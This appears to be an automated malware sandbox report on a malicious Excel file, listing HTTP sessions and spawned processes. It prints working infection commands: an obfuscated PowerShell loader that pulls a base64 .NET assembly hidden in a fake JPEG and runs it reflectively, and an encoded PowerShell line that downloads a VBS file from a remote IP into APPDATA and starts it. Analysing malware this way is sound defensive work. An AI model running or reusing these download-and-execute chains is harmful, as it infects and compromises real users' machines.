                        Data Ascii: (('Y0ulink = xR'+'mhttp://91.92.254.194/imge/new-image_v.jpg'+'xRm; Y0uwebC'+'lient = New-Object System.Net.WebClient; try { Y0udownlo'+'adedData '+'= Y0uwebClient.DownloadD'+'ata(Y0ulink) } catch { Write-'+'Host xRmFailed To download data from Y0ulinkxRm -ForegroundC'+'olor Red; exit }; if (Y0udownloadedData -ne Y0unull) { Y0uima'+'geText = [System.T'+'ext'+'.Encoding'+']::UTF8.'+'GetString(Y0udownloadedData); Y0ustartFlag = xRm<<B'+'ASE64_START>>xRm; Y0uendFlag = xRm<<BASE64_EN'+'D>>xRm; Y0ustartIndex = Y0uimageText.IndexOf(Y0ustartFlag); Y0uendIn'+'dex = Y0uimageText.IndexOf(Y0uendFlag); if (Y0ustartIndex -ge '+'0'+' -and Y0uendInd'+'ex -gt Y0'+'ustartInde'+'x) { Y0ustartIndex += Y0ustartFlag.Length; Y0ubase64Lengt'+'h = Y0uendIndex - Y0ustartIndex; Y0ubase'+'64Command = Y0uimageText.Su'+'bstring(Y0ustartIndex, Y0ubase64Length); Y0ucommandBytes = [System.Convert]::FromBase64String(Y0ubase64Command); Y0uloa
                        Jul 3, 2024 18:03:39.758760929 CEST448INData Raw: 64 65 64 41 73 73 65 6d 62 6c 79 20 3d 20 5b 53 79 73 74 65 6d 2e 52 65 66 6c 65 63 27 2b 27 74 69 6f 6e 2e 41 73 73 65 6d 27 2b 27 62 6c 79 5d 3a 3a 4c 27 2b 27 6f 61 64 28 59 30 75 63 6f 6d 6d 61 6e 64 42 79 74 65 73 29 3b 20 59 30 75 74 79 70
                        Data Ascii: dedAssembly = [System.Reflec'+'tion.Assem'+'bly]::L'+'oad(Y0ucommandBytes); Y0utype = Y0uloadedAssembly.GetType(xRm'+'RunPE.Hom'+'exRm); Y0umethod = Y0utype'+'.GetMethod(xRmV'+'AIx'+'Rm).Invoke(Y0unull, [object[]] (xRmtxt.44'+'46sabbbbbbbewmad


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        6192.168.2.224917191.92.254.194803324C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        TimestampBytes transferredDirectionData
                        Jul 3, 2024 18:03:40.912023067 CEST83OUTGET /imge/new-image_v.jpg HTTP/1.1
                        Host: 91.92.254.194
                        Connection: Keep-Alive
                        Jul 3, 2024 18:03:41.532833099 CEST1236INHTTP/1.1 200 OK
                        Date: Wed, 03 Jul 2024 16:03:41 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        Last-Modified: Wed, 03 Jul 2024 13:17:15 GMT
                        ETag: "67fd9-61c57a629b9c6"
                        Accept-Ranges: bytes
                        Content-Length: 425945
                        Keep-Alive: timeout=5, max=100
                        Connection: Keep-Alive
                        Content-Type: image/jpeg
                        Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1 d1 52 62 f0 15 72 82 92 e1 24 33 a2 b2 d2 f1 16 43 53 c2 08 34 63 17 25 35 36 73 93 e2 26 44 83 54 74 b3 c3 18 a3 d3 ff c4 00 14 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff c4 00 14 11 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                        Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#BRbr$3CS4c%56s&DTt?~5*sRM9RWhco#4q7[B6v^Tgc"TY_xWeXBX50xFs,/*Qcq2lyoT^=ofRGZ>(O5ceu;XG8s!u_.?,~XW!?$[8j=>gA>jz[WX)jO:q3n3VmmPo.TzccJAV9gp4;p7!vS~B]b#vo.%6i!?5<IOK~klm(=B*,xGU5Pay'rErv^uYt7*0ur$UxA-OF9>uI^O^gy4Ap
                        Jul 3, 2024 18:03:41.532856941 CEST1236INData Raw: 99 a5 de dc d9 e7 e1 ce 43 2e e2 4a 8e 39 fe 78 02 c9 15 df 24 ae de 08 e7 2c 17 69 24 8e 7b 60 55 94 81 c7 4c a8 bb e3 ae 15 ce e5 07 b6 50 29 ea 0d 60 10 48 c8 01 dc 6f b8 39 7f 3d ea fd 23 e0 3b e0 36 37 b7 d7 2c 8b 66 89 a0 d8 06 67 04 05 2b
                        Data Ascii: C.J9x$,i${`ULP)`Ho9=#;67,fg+{NmXm2CS(+"]meHR87j(3N{d"a``QX;e0`Y8l`XLOn{eXadN(ma]pQrXpIJI:{
                        Jul 3, 2024 18:03:41.532869101 CEST1236INData Raw: e9 0c 70 5c 60 8b 36 0f cc 64 96 29 a7 24 a9 e9 db 04 b1 2c ba 65 63 a8 00 29 e4 1e d8 02 dc fe 71 28 36 96 3e 9e 68 01 7c 65 b5 29 32 1b 96 cb 29 da 5b 75 f3 d7 0f f7 64 91 77 19 d5 52 bd 3c 65 9a 04 3a 32 ad 39 dc be aa 2b d7 e5 80 9c 9a 93 2c
                        Data Ascii: p\`6d)$,ec)q(6>h|e)2)[udwR<e:29+,AOQlAy1H=h?K.TMKxajg$jkV1SG*A13E0DoE~52>)X5OnFQM*uQMVy#o\>5$0!\DYX`
                        Jul 3, 2024 18:03:41.532928944 CEST1236INData Raw: 9b 1b 8e 59 08 20 77 ef 81 b5 2f 89 15 06 c9 2d 5c 6d c4 1f 54 e1 fc c6 72 37 71 4c 7a fc b1 32 69 85 9d cc 4f 37 99 5a ed 73 b7 89 69 f4 b6 41 17 25 1f 6e 47 18 1b 52 eb 3f 7b cf 4f 7c 13 6a 06 e0 43 7d 31 39 81 65 b0 7b e5 51 59 85 12 70 1b 1a
                        Data Ascii: Y w/-\mTr7qLz2iO7ZsiA%nGR?{O|jC}19e{QYpXjp,GW$Uq^BV@.P{;0k`o`YMItwC$eE+0xfJ.NyW,sEui`/eh?OQQ#y1XOO5A`1-W(=+ED
                        Jul 3, 2024 18:03:41.532941103 CEST896INData Raw: 80 2a 60 74 ef 64 8b 00 03 63 8e 98 1e 82 09 cb 79 72 9a da 0d d1 1c e0 55 27 3a a2 c1 88 8d 89 24 5f e9 81 f0 fd e8 19 a5 05 a4 6e 83 fc 39 a0 a4 35 58 1f 2b c0 4b 59 a2 d2 95 f3 59 5c 16 34 0a 11 c6 66 a4 fa 8d 1b 95 0c 5e 26 fe 12 6c 30 cd e7
                        Data Ascii: *`tdcyrU':$_n95X+KYY\4f^&l0*8<KHSQ7Y3&S\p)3v'r:/>2HPscb.F$e%*z*IMJ.D7}##H ml6fm"7LyF
                        Jul 3, 2024 18:03:41.612917900 CEST1236INData Raw: 66 63 c8 f9 65 03 79 a4 21 b2 3a 71 db 03 2e c8 9c 24 7b 9a fa fc 06 07 ba 3a c5 79 3c b6 3b 59 7b 91 f8 be 58 b6 b4 02 37 6d e7 bf c7 25 cd 2d 06 2c 3f 17 06 b1 43 36 d6 28 cc d4 dc 82 47 4f ae 00 1d 03 03 e9 c0 ec 01 b6 ed e9 8e 05 3b 6a ab db
                        Data Ascii: fcey!:q.${:y<;Y{X7m%-,?C6(GO;j\0U!BcG|"y nGg. &C*Q^G#qQ$q"pH9`zjxW.VzHIG+V<GAFcqtMEgf`O>tA\o
                        Jul 3, 2024 18:03:41.612955093 CEST1236INData Raw: b4 b7 5c 10 66 00 ed 41 c7 52 70 04 94 d3 2d 1d a4 b1 fe 43 3e e1 f6 47 4a fa 8f d9 77 85 42 8c 81 a6 f1 2d 44 44 c8 c1 7f 1e 9e 64 ee 47 f8 bf f7 e9 9f 0d 7b 0e 18 2f 3f a6 7d ab ec 46 a3 4e 9f b2 c8 75 5a e7 61 1c 3e 36 d2 46 b1 d1 26 a2 06 8f
                        Data Ascii: \fARp-C>GJwB-DDdG{/?}FNuZa>6F&,5UjRG"*{w9?j_H}HO3z9IxoVBjlqQ8eILh,/g>o}+I~:$
                        Jul 3, 2024 18:03:41.612967014 CEST1236INData Raw: cd 75 46 06 58 be fd 14 a5 18 f4 a8 82 d7 d6 b3 16 27 94 fd a0 d5 b0 1b a4 30 81 ea eb d1 70 32 cc c7 c6 4b 95 0a 46 a2 1b 1d ba 1c 0f 4b f6 cb c7 a2 d4 f8 bf 86 6b 22 13 2a ab 02 c8 c4 15 0a ac ad c5 73 d8 67 ae 97 ed 8e 88 23 21 d3 3b 29 17 b8
                        Data Ascii: uFX'0p2KFKk"*sg#!;)|+MYe6]M}GBV)/n^X f{ U/Mv0nQ)R{dvhn C_oz>hqw>qJh,O]4(M3=$prNHs1ixp}
                        Jul 3, 2024 18:03:41.613054037 CEST1236INData Raw: d4 1c 0f 4e 9f 69 74 e0 12 21 90 df 52 5b ae 43 f8 ee 9e 48 c0 30 c8 2f b8 6a 39 85 0c 04 8d bd 47 be 1a 5d 2b 42 02 b9 36 39 aa c0 d9 8b c5 b4 0e a5 3c 89 41 5f e2 26 f0 4d e2 30 ed 67 11 b5 76 e4 0f ae 66 42 db 45 91 57 c5 e1 9d 4a a8 25 41 07
                        Data Ascii: Nit!R[CH0/j9G]+B69<A_&M0gvfBEWJ%A(F ey{=^,<7Rg:)%Y14eJ<auz})TI"p=Fqp0kfpU|/e>Oq};3FYmxa|I'4J:B=
                        Jul 3, 2024 18:03:41.613152981 CEST1236INData Raw: 38 af 86 30 db cb 14 2f 60 76 18 04 49 3c c5 52 b4 08 fc 40 fc f1 89 1b 69 da 2a ab af c7 12 89 1d 24 21 40 03 83 ce 16 42 e4 92 48 35 d8 60 43 fe 06 51 cd 9b 19 78 95 96 15 60 8a 2c d1 c9 82 64 8c 16 64 26 f0 ab 3c 0e de a4 60 09 ba be d8 02 fb
                        Data Ascii: 80/`vI<R@i*$!@BH5`CQx`,dd&<`iA*<i;As-#@+4e8L04~s1v{5esq1ibdd0C,)(uhtmoT8PdH*rv#e)v;@Ish
                        Jul 3, 2024 18:03:41.613274097 CEST1236INData Raw: 15 78 25 79 03 db 32 f4 11 eb 24 f1 a6 3a a9 e9 51 2f 62 31 0a 18 dd 0a ee 48 e4 e6 bc 8a ea db 55 0c 9c 85 36 68 55 e0 7c f3 ed 4a be 9b c4 d0 47 34 a5 5d 43 72 6a ba f1 9c 9a 8d 34 fa 38 fc e5 32 35 ed 0a 41 e0 9b 3d 47 3d b1 df b4 70 a6 a3 c7
                        Data Ascii: x%y2$:Q/b1HU6hU|JG4]Crj4825A=G=pG/|v>*M)phJeenBx}66Ov$EZX\:2A hCS!v|kxD<Ct??wH?I?U/;I>A$Gsl


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        7192.168.2.2249172198.46.178.144803324C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        TimestampBytes transferredDirectionData
                        Jul 3, 2024 18:03:45.959034920 CEST88OUTGET /madamwebbbbbbbas6444.txt HTTP/1.1
                        Host: 198.46.178.144
                        Connection: Keep-Alive
                        Jul 3, 2024 18:03:46.436088085 CEST1236INHTTP/1.1 200 OK
                        Content-Type: text/plain
                        Last-Modified: Tue, 02 Jul 2024 09:00:11 GMT
                        Accept-Ranges: bytes
                        ETag: "96b1143f5eccda1:0"
                        Server: Microsoft-IIS/10.0
                        Date: Wed, 03 Jul 2024 16:03:46 GMT
                        Content-Length: 325632
                        Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [TRUNCATED]
                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA8DUAAAAMAwAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgCN4TesJWblN3ch9CPK0gPvZmbJR3c1JHdvwDIgoQD+kHdpJXdjV2cvwDIgACIK0gPzV2ZlxWa2lm
                        Jul 3, 2024 18:03:46.436116934 CEST1236INData Raw: 63 51 52 57 5a 30 4e 58 5a 31 46 58 5a 79 39 43 50 67 41 43 49 67 41 43 49 4b 30 67 50 76 49 53 5a 7a 78 57 59 6d 4a 53 50 7a 4e 58 5a 6a 4e 57 51 70 56 48 49 69 49 58 5a 72 39 6d 64 75 6c 30 63 68 4a 53 50 73 56 6d 64 6c 78 47 49 73 56 6d 64 6c
                        Data Ascii: cQRWZ0NXZ1FXZy9CPgACIgACIK0gPvISZzxWYmJSPzNXZjNWQpVHIiIXZr9mdul0chJSPsVmdlxGIsVmdlxkbvlGd1NWZ4VEZlR3clVXclJHPgACIgACIgAiCN4jIzYnLtNXY602bj1Cdm92cvJ3Yp1WLzFWblh2YzpjbyVnI9Mnbs1GegMXZnVGbpZXayBFZlR3clVXclJHPgACIgACIK0gP5RXayV3YlNHPgACIgoQD+IiM25
                        Jul 3, 2024 18:03:46.436130047 CEST1236INData Raw: 41 77 41 41 4d 41 45 41 41 41 45 41 2b 41 41 41 41 76 42 67 5a 41 34 47 41 4a 42 51 5a 41 77 47 41 70 42 67 52 41 63 47 41 75 42 51 61 41 49 48 41 30 42 77 55 41 45 41 41 41 49 41 48 45 41 4c 41 41 41 41 41 41 41 41 41 75 42 77 62 41 6b 47 41 30
                        Data Ascii: AwAAMAEAAAEA+AAAAvBgZA4GAJBQZAwGApBgRAcGAuBQaAIHA0BwUAEAAAIAHEALAAAAAAAAAuBwbAkGA0BQYAwGAzBgbAEGAyBAVAAAAEAAJAAAAAAwbAYGAuBQSAUGAsBQaAYEAyBQYAYFABAAAAQEAAAAAAAAAAAAAAAAAAAQAAAAAEAAAAAAAAAwPAAAAAAQAAAAAAAAAAEAAAAQAAAg/vTQvAAAAAAwTAYEAOBQSA8FAOB
                        Jul 3, 2024 18:03:46.436187029 CEST1236INData Raw: 45 46 30 52 43 4a 77 65 67 53 67 77 42 52 63 51 42 64 45 41 41 46 6f 51 64 52 45 41 41 46 67 51 42 64 30 67 41 41 59 41 43 46 30 42 44 43 41 67 42 49 55 51 48 4c 49 41 41 47 67 51 42 64 63 67 41 41 59 77 41 64 4d 51 48 59 48 59 45 44 63 51 43 63
                        Data Ascii: EF0RCJwegSgwBRcQBdEAAFoQdREAAFgQBd0gAAYACF0BDCAgBIUQHLIAAGgQBdcgAAYwAdMQHYHYEDcQCcwhDOMAAGESECEAIFgQIRQegSkQBdkQCgHoEIcAEIgQHSMwBGgQIRQegSgQBdggBHwACdIhAHUACRJRFDKxAHgACIUQHBMAIHgQUSUQHVMoEEcgC9LoEBCoERJRADAyCtLYERMYERMYEBMAIMUIgSAAAFkvgSYABKk
                        Jul 3, 2024 18:03:46.436199903 CEST896INData Raw: 67 53 34 67 44 46 30 42 43 4f 67 41 43 49 67 67 44 49 6b 41 43 4f 45 78 42 59 30 6d 45 41 41 41 42 49 67 51 42 64 30 42 43 46 30 52 48 46 30 42 43 46 30 52 42 64 67 67 43 48 4d 42 43 46 30 52 43 49 51 77 42 48 67 51 42 64 30 52 43 46 30 42 47 49
                        Data Ascii: gS4gDF0BCOgACIggDIkACOExBY0mEAAABIgQBd0BCF0RHF0BCF0RBdggCHMBCF0RCIQwBHgQBd0RCF0BGIUQHHcQDIUQHJgBBHcAGBEAAEgQCIUQHkGYEF0BGYgRCH8ACIgQBdUQHF0hBHsACIgACIUQHGcQCIEgCDgACIgQBdUwBIgQBdUhgSUQHVIoEFcQDI4QFCKRBdUhgSUwBMggDVIoEF0RFCKRBd4wBH8ACVIoERHoEF0
                        Jul 3, 2024 18:03:46.436213017 CEST1236INData Raw: 44 4f 6b 77 42 50 41 67 48 42 6f 41 42 63 34 51 41 67 51 41 43 74 4a 6f 45 43 63 67 42 31 34 6b 4e 74 61 46 4f 2f 47 44 43 4f 30 68 44 4f 49 41 41 47 51 6e 45 42 45 4f 67 52 55 78 42 49 51 6e 45 42 45 4f 67 52 55 42 64 53 4d 77 42 4d 51 6e 45 42
                        Data Ascii: DOkwBPAgHBoABc4QAgQACtJoECcgB14kNtaFO/GDCO0hDOIAAGQnEBEOgRUxBIQnEBEOgRUBdSMwBMQnEB0kEVYACI4QHAFoEO4QBdUQHAGoEOUQHF0BgBKhDO4AC4FoEYFoEF0hDOAUgSEQTSUxFH8CCtGoEBAiBIggDdAUgS4gDF0RBdAYgS4QBdUQHAGoEO4gDIgXgSUegS0XgS4QBd4AQBKRANJRFYcgMIknE5HoEtGoEOE
                        Jul 3, 2024 18:03:46.436460018 CEST1236INData Raw: 56 43 47 52 46 4e 45 77 45 41 4d 68 41 56 4a 59 45 56 41 41 49 4c 77 51 67 53 45 51 54 53 55 68 44 43 30 6c 45 56 77 41 44 42 4b 52 41 4e 4a 52 46 4f 49 51 58 53 55 52 41 4b 34 41 43 4d 45 6f 45 42 45 4f 67 52 55 42 44 42 4b 52 41 4e 4a 52 46 4f
                        Data Ascii: VCGRFNEwEAMhAVJYEVAAILwQgSEQTSUhDC0lEVwADBKRANJRFOIQXSURAK4ACMEoEBEOgRUBDBKRANJRFOIQVCGRFAFoEB0kEVwQgSwQgSEQTSUhDCEWEVwQgSEQTSUhDC0lEVwUgS4QBd4gDAFoEB0kEV0wBJhQBdgACF0BCFAiCIElgSEdgS0kgSgQBdUQHF0BCHMhATAAIE4gDOMQSCKRFB0kEVwgATEwEAMRADASCO4gDDk
                        Jul 3, 2024 18:03:46.436471939 CEST1236INData Raw: 44 4f 30 42 43 4f 30 68 44 41 46 6f 45 42 30 6b 45 56 4d 78 42 6d 67 41 43 4f 30 42 43 4f 30 42 51 42 4b 68 44 4f 30 68 44 4f 30 68 44 41 46 6f 45 42 30 6b 45 56 77 77 42 61 67 41 43 4f 30 42 43 4f 30 68 44 64 34 67 44 4f 34 67 44 4f 34 51 48 4f
                        Data Ascii: DO0BCO0hDAFoEB0kEVMxBmgACO0BCO0BQBKhDO0hDO0hDAFoEB0kEVwwBagACO0BCO0hDd4gDO4gDO4QHO4QHAFoEB0kEVAxBdggDVIoEOUQHRHoEVIoEF0hDJcwEI4ACCAQBI4ACO4ACO4gDJcwCO4gABHYEVcgDOIQvBKRFHgwAdMQHD0xAd4gDCEcgRUhDOIQXSUhDCEcgRUhDOAUgS4AUBKhDAFoEB0kEV4wBvQegSEQ4AG
                        Jul 3, 2024 18:03:46.436490059 CEST1236INData Raw: 48 4f 49 41 41 46 67 77 41 42 41 43 42 49 67 51 42 64 55 41 43 4f 34 77 42 48 6f 41 43 44 30 78 41 64 67 67 44 64 55 51 48 4f 34 41 51 42 4b 68 44 64 34 77 43 48 51 42 43 41 46 6f 45 41 46 6f 45 42 30 6b 45 56 4d 77 42 4e 67 41 41 54 45 41 49 46
                        Data Ascii: HOIAAFgwABACBIgQBdUACO4wBHoACD0xAdggDdUQHO4AQBKhDd4wCHQBCAFoEAFoEB0kEVMwBNgAATEAIFAYgSEQTSUxBpHYEO0hDdIAIJ4gDlHoECAwBI4QHI4QHAFoEB0kEVAUgS4QBdUQHAGoE4FoEO4gDdgQBdggDO4gDdAUgSEQTSUhFHETBd4QACAiBI0dgSIwBGgACF0RBdMAIIUQHF0R0BKhAgkQ2BGRABAiBxFRABA
                        Jul 3, 2024 18:03:46.436505079 CEST1236INData Raw: 67 53 67 52 2f 41 4b 52 49 52 30 50 67 53 67 42 48 49 67 42 47 49 67 52 49 52 77 42 43 4f 45 53 45 43 30 6c 45 56 67 42 43 59 67 51 57 53 67 41 43 70 46 6f 45 41 46 6f 45 42 30 6b 45 56 63 79 42 53 42 77 45 42 55 57 67 53 55 52 41 42 41 69 43 49
                        Data Ascii: gSgR/AKRIR0PgSgBHIgBGIgRIRwBCOESEC0lEVgBCYgQWSgACpFoEAFoEB0kEVcyBSBwEBUWgSURABAiCIFoEBEOgRUBCIFoEB0kEVcACIFoEBEOgRUBSBKBQBKRANJRFEcQFIwTgSIwBGgACCcABhFoEBEAIGwmEBoABIwmEsJBbSQwBJgAHC4ABHYACJEAAEgACBAABI4AGIgAGCUQHdIRCH0ACdIBCDcgBcEQAAQgAQwRACA
                        Jul 3, 2024 18:03:46.441257000 CEST1236INData Raw: 45 47 51 41 50 43 47 68 42 45 67 6a 67 52 59 41 42 49 34 41 43 43 30 6c 45 56 45 41 41 4a 34 41 43 43 30 6c 45 56 34 41 43 43 30 6c 45 56 45 41 41 4f 34 67 44 43 30 6c 45 56 41 41 41 49 34 51 48 4f 67 66 67 52 49 41 41 49 67 42 46 43 47 52 41 41
                        Data Ascii: EGQAPCGhBEgjgRYABI4ACC0lEVEAAJ4ACC0lEV4ACC0lEVEAAO4gDC0lEVAAAI4QHOgfgRIAAIgBFCGRAAYgCQghACAgBYkAEJgBGCUAAJgRCJgRCJ4AGHAgCJkQCQIYEYgRBAoAFB4QCJwggRgBGYYAALkQHS4QCDAwBgIYECkAGQgBGYIwBA0QCCwhgRgxAAgACQgAGkIYEIIYEEAADIABCYghgRgBCCGRBA0AAAAQLEAAAAU


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        8192.168.2.2249173208.95.112.1803440C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                        TimestampBytes transferredDirectionData
                        Jul 3, 2024 18:03:52.340533018 CEST80OUTGET /line/?fields=hosting HTTP/1.1
                        Host: ip-api.com
                        Connection: Keep-Alive
                        Jul 3, 2024 18:03:52.855227947 CEST175INHTTP/1.1 200 OK
                        Date: Wed, 03 Jul 2024 16:03:52 GMT
                        Content-Type: text/plain; charset=utf-8
                        Content-Length: 6
                        Access-Control-Allow-Origin: *
                        X-Ttl: 60
                        X-Rl: 44
                        Data Raw: 66 61 6c 73 65 0a
                        Data Ascii: false
                        Jul 3, 2024 18:03:53.064042091 CEST175INHTTP/1.1 200 OK
                        Date: Wed, 03 Jul 2024 16:03:52 GMT
                        Content-Type: text/plain; charset=utf-8
                        Content-Length: 6
                        Access-Control-Allow-Origin: *
                        X-Ttl: 60
                        X-Rl: 44
                        Data Raw: 66 61 6c 73 65 0a
                        Data Ascii: false


                        Click to jump to process

                        Click to jump to process

                        Click to dive into process behavior distribution

                        Click to jump to process

                        Target ID:0
                        Start time:12:02:34
                        Start date:03/07/2024
                        Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        Wow64 process (32bit):false
                        Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                        Imagebase:0x13fe00000
                        File size:28'253'536 bytes
                        MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:false

                        Target ID:4
                        Start time:12:03:26
                        Start date:03/07/2024
                        Path:C:\Windows\System32\mshta.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\System32\mshta.exe -Embedding
                        Imagebase:0x13fed0000
                        File size:13'824 bytes
                        MD5 hash:95828D670CFD3B16EE188168E083C3C5
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:5
                        Start time:12:03:28
                        Start date:03/07/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\system32\cmd.exe" "/C poWersHEll -ex bYPAsS -nOp -W 1 -C deVIcEcrEDENtiAlDePlOyMenT.ExE ; Iex($(IEX('[SYsTEm.tExt.EncODIng]'+[chAr]58+[CHaR]0X3a+'uTf8.GetSTRInG([SySteM.CONVErT]'+[ChaR]58+[Char]58+'fRomBaSe64StrINg('+[CHAr]0X22+'JHlsc0ozTHU3NyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1CRXJkRWZpTml0SW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwaW1GQ1NhWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjSFhoVEtzcnBILHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFlLUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdGKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInZTcElNclJ2SXpVIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgU3puVSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHlsc0ozTHU3Nzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC40Ni4xNzguMTQ0L2V2ZW5pbmdmaWxlZGF0aW5nbG92ZXIudmJzIiwiJEVOdjpBUFBEQVRBXGV2ZW5pbmdmaWxlZGF0aW5nbG92ZXIudkJTIiwwLDApO3N0QXJULXNMZUVQKDMpO3N0YVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVudjpBUFBEQVRBXGV2ZW5pbmdmaWxlZGF0aW5nbG92ZXIudkJTIg=='+[chAR]34+'))')))"
                        Imagebase:0x4a0a0000
                        File size:345'088 bytes
                        MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:7
                        Start time:12:03:28
                        Start date:03/07/2024
                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):false
